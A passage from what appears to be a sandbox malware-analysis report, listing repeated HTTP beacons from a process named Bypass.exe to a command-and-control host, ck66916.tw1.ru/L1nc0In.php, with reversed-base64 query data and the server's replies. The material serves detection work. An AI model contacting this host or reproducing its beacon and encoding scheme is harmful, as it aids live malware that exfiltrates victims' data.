/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:55:06.796613932 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.44976092.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:11.808259964 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:55:12.501444101 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.44976192.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:17.511843920 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:55:18.221051931 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.44976292.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:23.353847027 CEST2220OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2 [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:55:24.045906067 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:23 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.44976392.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:29.058640003 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:55:29.763211966 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:29 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.44976492.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:34.777014017 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:55:35.485198021 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:35 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.44976592.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:40.495696068 CEST2223OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Jun 23, 2024 06:55:41.188306093 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.44976692.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:46.202213049 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:55:46.913162947 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 104
                        Connection: keep-alive
                        Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65
                        Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.44976792.53.96.121807004C:\ProgramData\SoftwareDistribution\Bypass.exe
                        TimestampBytes transferredDirectionData
                        Jun 23, 2024 06:55:52.191972017 CEST2247OUTGET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED]
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                        Host: ck66916.tw1.ru
                        Connection: Keep-Alive
                        Jun 23, 2024 06:55:52.884943008 CEST267INHTTP/1.1 200 OK
                        Server: nginx/1.24.0
                        Date: Sun, 23 Jun 2024 04:55:52 GMT
                        Content-Type: text/html; charset=UTF-8
